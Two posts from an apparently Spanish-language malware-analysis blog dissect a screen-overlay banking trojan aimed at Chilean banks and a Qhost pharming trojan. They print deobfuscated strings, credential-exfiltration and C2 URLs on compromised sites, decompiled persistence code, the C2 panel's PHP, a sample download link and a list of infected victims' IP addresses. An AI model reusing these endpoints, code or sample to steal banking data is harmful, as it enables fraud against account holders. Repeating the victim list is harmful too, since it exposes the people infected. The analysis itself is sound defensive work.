jueves, 13 de febrero de 2014

Troyano: Informe deuda Gobierno de Chile


Les traigo este troyano Screen Overlay programado en Delphi, el cual roba datos de cuentas bancarias de entidades de Chile. Como novedad, un poco vieja y vetusta.. oldschool como diría el downloader descarga un modulo para inutilizar las actualizaciones o descargas de antivirus con el viejo truco de agregar los sitios en el archivo .host apuntando a la dirección loopback.

E-mail Phishing


Los links aprovechan de una vulnerabilidad de redireccion de url.

hxxp://www.buylebanese.com/authenticate.asp?redirectto=http://www.xxxx.br//envio2/Abrir_DOC.zip

Descargamos la amenaza con malzilla.





Lo subimos a Virus total y descubrimos un indice casi nulo en detecciones 1/47, siendo que solamente esta compactado con UPX. (mal por los muchachos buenos...)




Descarga dos payloads y lo ejecuta, uno es el sound.exe y updateflash.exe






sound.exe Corresponde al troyano bancario Screen Overlay.

V.T. 4/50




Formularios desplegados por la amenaza cuando se vista un determinado URL.

https://www.bancochile.cl/SecurityDevicesAdmin/menuMain.do?
bciimg.bci.cl/sitioseguro/NuevoLogin_act.html',0000h
bci.cl/cl/bci/aplicaciones/seguridad/autenticacion/autenticacionSegundaClave.jsf
https://www.bancochile.cl/bchile-perfilamiento/Process?MID=&AID=LOGIN
https://www.bancosecurity.cl/security/loginsecurity.asp
https://www.bancosecurity.cl/empresas/login/usuario/menu/menuInicio.asp
https://www.bancosecurity.cl/security/cartolaexpress/ba_saldos.asp?
https://empresas.bancosecurity.cl/login-contenido/index.asp
http://www.bci.cl/personas/
www.itau.cl/personas/process.asp?MID=&AID=LOGIN
www.itau.cl/personas/azurian.asp

https://banco.itau.cl/wps/portal/BICPublico/acceso-clientes









Cadenas del troyano (desofuscadas)


.::: Itaú :::. TABELA
=================================
Rut
Clave
Correo
Clave
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
{{{{ Tarjeta de Coordenadas }}}}
[A1]
[A2]
[A3]
[A4]
[A5]
[B1]
[B2]
[B3]
[B4]
[B5]
[C1]
[C2]
[C3]
[C4]
[C5]
[D1]
[D2]
[D3]
[D4]
[D5]
[E1]
[E2]
[E3]
[E4]
[E5]
[F1]
[F2]
[F4]
[F5]
[G1]
[G2]
[G3]
[G4]
[G5]
[H1]
[H2]
[H3]
[H4]
[H5]
[I1]
[I2]
[I3]
[I4]
[I5]
[J1]
[J2]
[J3]
[J4]
[J5]
Gracias por confiar en Itau.cl, ahora ya puede acceder a su cuenta normalmente.
.::: Itaú :::. CORREO
=======================
Correo
Clave
https://banco.itau.cl/wps/portal/BICPublico/acceso-clientes
=======================
Rut
Clave
www.itau.cl/personas/process.asp?MID=&AID=LOGIN
www.itau.cl/personas/azurian.asp
.::: Security :::. TABELA
=================================
Rut
Clave
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
{{{{ Tarjeta de Coordenadas }}}}
[A1]
[A2]
[A3]
[A4]
[A5]
[B1]
[B2]
[B3]
[B4]
[B5]
[C1]
[C2]
[C3]
[C4]
[C5]
[D1]
[D2]
[D3]
[D4]
[D5]
[E1]
[E2]
[E3]
[E4]
[E5]
[F1]
[F2]
[F4]
[F5]
[G1]
[G2]
[G3]
[G4]
[G5]
[H1]
[H2]
[H3]
[H4]
[H5]
[I1]
[I2]
[I3]
[I4]
[I5]
[J1]
[J2]
[J3]
[J4]
[J5]
javascript:daSubmit();
javascript
https://personas.bancosecurity.cl/
=======================
Rut
Clave
frut
clave
.::: Security Persona :::..
lrut
lpass
.::: Security Empresa :::...
https://www.bancosecurity.cl/security/loginsecurity.asp
https://www.bancosecurity.cl/empresas/login/usuario/menu/menuInicio.asp
https://www.bancosecurity.cl/security/cartolaexpress/ba_saldos.asp?
input
entrar
https://empresas.bancosecurity.cl/login-contenido/index.asp
http://www.bci.cl/personas/
=======================
Rut
Clave
=======================
((( TOKEN 2 )))
.::: BCI :::. TOKEN
=======================
((( TOKEN 1 )))
=======================
Serial del Token
=======================
((( TOKEN 3 )))
====================
DIGIPASS 2
DIGIPASS 3
DIGIPASS 4
====================
DIGIPASS 1
www.bancodechile.cl
=======================
Rut
Clave
https://www.bancochile.cl/bchile-perfilamiento/Process?MID=&AID=LOGIN
oft\Windows\Cu
GVideo
SkypeMS
.::: Itaú :::.
.::: BCI :::.
.::: BANCO DE CHILE :::.
pcnome=
http://www.jjsports.com.tw//talk/cache/lop.php
titulo=
texto=
http://www.jaakkootaara.fi/img/kot.php
http://users.jyu.fi/~vitapasa/counter/kot.php
http://www.jaakkootaara.fi/img/nbas.php
http://users.jyu.fi/~vitapasa/counter/lays.php
.exe
.exe
Banco Security
Itaú OnLine Banking
Bci.cl - Personas 
Personas | Banco de Chile
Banca Preferencial | Banco de Chile

El envío de los datos robados es a través de distintos .php en sitios comprometidos.

http://www.jjsports.com.tw//talk/cache/lop.php
http://www.jaakkootaara.fi/img/kot.php
http://users.jyu.fi/~vitapasa/counter/kot.php
http://www.jaakkootaara.fi/img/nbas.php
http://users.jyu.fi/~vitapasa/counter/lays.php

Los datos son grabados en un txt en forma ofuscada:



Aquí desofuscado con un decoder que arme.







updateflash.exe Se ejecuta como una falsa actualización de Adobe Flash la cual intenta interferir en las actualizaciones de los antivirus e inutilizarlos quitando accesos a la carpetas donde se encuentran instalados.

V.T. 8/49








 0049480C 'La instalación de Flash Player ha finalizado'


Lineas agregadas al .host para evitar que los antivirus instalados puedan actualizarse o descargarse. (también quita accesos a este archivo)



Carpetas y archivos a los cuales se le quitara el acceso a todo usuario o grupo.


 0049447C '\\Trend Micro'
 00494494 'TrustedInstaller'
 004944B0 '\\Avira'
 004944C0 '\\Avira\\AntiVir Desktop'
 004944E0 '\\ESET\\ESET NOD32 Antivirus\\ekrn.exe'
 0049450C '\\ESET\\ESET NOD32 Antivirus'
 00494530 '\\ESET'
 00494540 '\\AVAST Software'
 00494558 '\\AVAST Software\\Avast'
 00494578 '\\Common Files\\Mcafee\\Platform'
 004945A0 '\\McAfee\\MSC'
 004945B4 '\\McAfee.com\\Agent'
 004945D0 '\\McAfee'
 004945E0 'C:\\Windows\\System32\\drivers\\etc\\hosts'
 0049462C 'C:\\Windows\\System32\\drivers\\etc\\hosts'




 Rutina que quita los accesos.



Así quedan.






Panel donde se envío la campaña de Phishing:



muestra: https://www.dropbox.com/s/a6wus1509cot0gm/banload%2012-02-14.rar


Es todo por el momento.

@Dkavalanche 2014

lunes, 3 de febrero de 2014

Qhost - Facebook.exe


Hoy les traigo este pequeño troyano Qhost, que realiza pharming local a distintas entidades bancarias latinoamericanas. Este caso me lo envió Xylit0l, así que todos los créditos son para el que me lo entrego servido en bandeja. Gracias Xyli!


Descarga de la amenaza



Analisis en VT con una detección alta por parte de los A.V.





El troyano no tiene capa de ofuscación.



El troyano se copia a la carpeta de windows\temp con el nombre cftmon.exe


   loc_00402781: FileCopy var_18, CStr(Environ("TMP") & "\cftmon.exe")

Persistencia en el sistema.

  loc_00403275: var_3C = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & var_18



Es un troyano muy simple, se comunica con el C&C vía distintos PHP, y estos escriben en archivos de texto.


Public Sub Proc_0_3_4028B0
  loc_004028D2: var_8 = &H4011C8
  loc_00402913: var_3C = "http://www.volkanakyildiz.com/galeri/WebPanel/prueba.php"
  loc_0040291D: var_34 = "http://www.volkanakyildiz.com/galeri/WebPanel/host.txt"
  loc_00402923: Proc_00402AF0(var_60, edx, ecx)
  loc_00402934: var_78 = "\drivers\etc\hosts"
  loc_0040293B: var_80 = 8
  loc_00402942: var_70 = var_60 & "\drivers\etc\hosts"
  loc_00402949: var_60 = "\drivers\etc\hosts"




PHP donde reporta el Troyano

 $Fileusers="users.txt";
 $contador="contador.txt";



  if( $_POST["Datos"] )
  {
  $pDatos=$_POST["Datos"];
     list($ID,$OS)=explode("|",$pDatos);
 
//Leemos
$hfileuser = fopen($Fileusers, "r");
//Almacenamos
$Udatos = fread($hfileuser, filesize($Fileusers));
// Cerramos 
fclose($hfileuser);
if (strpos($Udatos, $ID) === false){
 Escribir($ID,$OS);
 Contador();
echo "El No existe Lo escribo";   //Si no Existe el IDE llamo a escribir
}
  }
  

function Escribir($uID,$uOS){
 global $Fileusers;
 //CPUID=gerg34534;OS=Windows 7;IP=124.1234.2342.213
$IP=$_SERVER["REMOTE_ADDR"];
$hfile= fopen($Fileusers, "a+");
$r= fwrite($hfile,"CPUID=" . $uID . ";OS=" . $uOS . ";IP=" . $IP . PHP_EOL);
fclose($hfile);

 }

  function Contador(){
  global $contador;
 // Abrimos el archivo para solamente leerlo (r de read)
$abre_visitas = fopen($contador, "r");
// Leemos el contenido del archivo
$total = fread($abre_visitas, filesize($contador));
// Cerramos el archivo
fclose($abre_visitas);

// Abrimos nuevamente el archivo
$abre_visitas = fopen($contador, "w");
// Sumamos 1 nueva visita
$total = $total + 1;

// Y reemplazamos por la nueva cantidad de visitas 
$grabar_visitas = fwrite($abre_visitas, $total);
// Cerramos la conexión al archivo
fclose($abre_visitas);

 }

?>



Panel de Login del Comando y Control



Panel donde el botmaster cargara el archivo host para el pharming, este panel no esta securizado, se puede acceder directamente sin pasar por el login... cosa de locos...



Shell que se subió al sitio comprometido para tomar el control del servidor.


El listado de usuarios infectados se encuentra en un archivo txt (usuarios.txt)

PHP el cual lista los usuarios:


$inputfile = file("users.txt");

$data_lines = array();
foreach ($inputfile as $line)
{
    $data_lines[] = explode(";", $line);
}

//Get column headers.
$first_line = array();
foreach ($data_lines[0] as $dl)
{
    $first_line[] = explode("=", $dl);
}
$headers = array();
foreach ($first_line as $fl)
{
    $headers[] = $fl[0];
}

Listado

CPUID=;OS=Windows 7 Enterprise;IP=122.166.231.83
CPUID=;OS=Windows 7 Enterprise;IP=122.166.231.83
CPUID=0FABFBFF000206D7;OS=Microsoft Windows XP;IP=4.31.163.2
CPUID=0FABFBFF000106A5;OS=Microsoft Windows XP;IP=4.31.163.2
CPUID=BFEBFBFF0001067A;OS=Windows 7 Ultimate;IP=181.160.123.96
CPUID=BFEBFBFF0001067A, BFEBFBFF0001067A;OS=Microsoft Windows XP;IP=186.34.14.218
CPUID=3FEBF9FF00000F12;OS=Microsoft Windows XP;IP=181.160.22.215
CPUID=BFE9FBFF000006EC;OS=Windows 7 Professional;IP=179.56.32.63
CPUID=BFE9FBFF000106CA;OS=Microsoft Windows XP;IP=201.239.140.115
CPUID=078BFBFD00000623;OS=Microsoft Windows XP;IP=66.129.99.119
CPUID=078BFBFF00020FC2;OS=Microsoft Windows XP;IP=186.104.202.117
CPUID=078BFBFF00100F62;OS=Microsoft Windows XP;IP=190.101.28.187
CPUID=078BFBFD00000F61;OS=Microsoft Windows XP;IP=66.187.149.88
CPUID=BFEBFBFF000306A9;OS=Windows 7 Enterprise;IP=163.247.60.12
CPUID=0383F9FF00000673;OS=Microsoft Windows XP;IP=143.215.130.105
CPUID=078BFBFF00100F63;OS=Windows 8 Pro;IP=190.44.82.162
CPUID=078BFBFF00100F23;OS=Microsoft Windows XP;IP=72.12.209.146
CPUID=BFEBFBFF00020652;OS=Microsoft Windows XP;IP=186.9.71.164
CPUID=BFEBFBFF00000F65;OS=Microsoft Windows XP;IP=186.104.236.120
CPUID=;OS=Microsoft Windows XP;IP=176.31.181.165
CPUID=BFEBFBFF000006FD;OS=Microsoft Windows XP;IP=200.14.137.67
CPUID=178BFBFF00500F20;OS=Windows 8 Single Language;IP=190.22.78.182
CPUID=0781ABF900000633;OS=Microsoft Windows XP;IP=66.249.82.231
CPUID=BFEBFBFF000206A7;OS=Windows 7 Professional;IP=181.73.97.84
CPUID=;OS=Microsoft Windows XP;IP=216.232.78.104
CPUID=;OS=Microsoft Windows XP;IP=194.94.127.23
CPUID=BFEBFBFF000106CA;OS=Windows 7 Starter;IP=186.104.131.128
CPUID=;OS=Microsoft Windows XP;IP=66.215.81.155
CPUID=BFEBFBFF000006F2;OS=Microsoft Windows XP;IP=200.104.168.40
CPUID=078BFBFF00600F12;OS=Windows 7 Professional N;IP=122.166.184.37
CPUID=0F8BFBFF000006FB;OS=Microsoft Windows XP;IP=95.26.62.147
CPUID=;OS=Microsoft Windows XP;IP=216.232.78.104
CPUID=;OS=Windows 7 Professional;IP=74.55.187.42
CPUID=;OS=Microsoft Windows XP;IP=74.55.187.42
CPUID=BFEBFBFF000006F2, 0000000000000000;OS=Microsoft Windows XP;IP=187.133.146.104


Como puede verse no son muchos los usuarios infectados, quizás por la taza de detección por parte de los antivirus .

Zip encontrado en el servidor con el kit del panel del comando y control.





Es todo por el momento.

@Dkavalanche 2014



 Hola, me mudé a medium .... nos vemos!!! FELIZ 2022!!!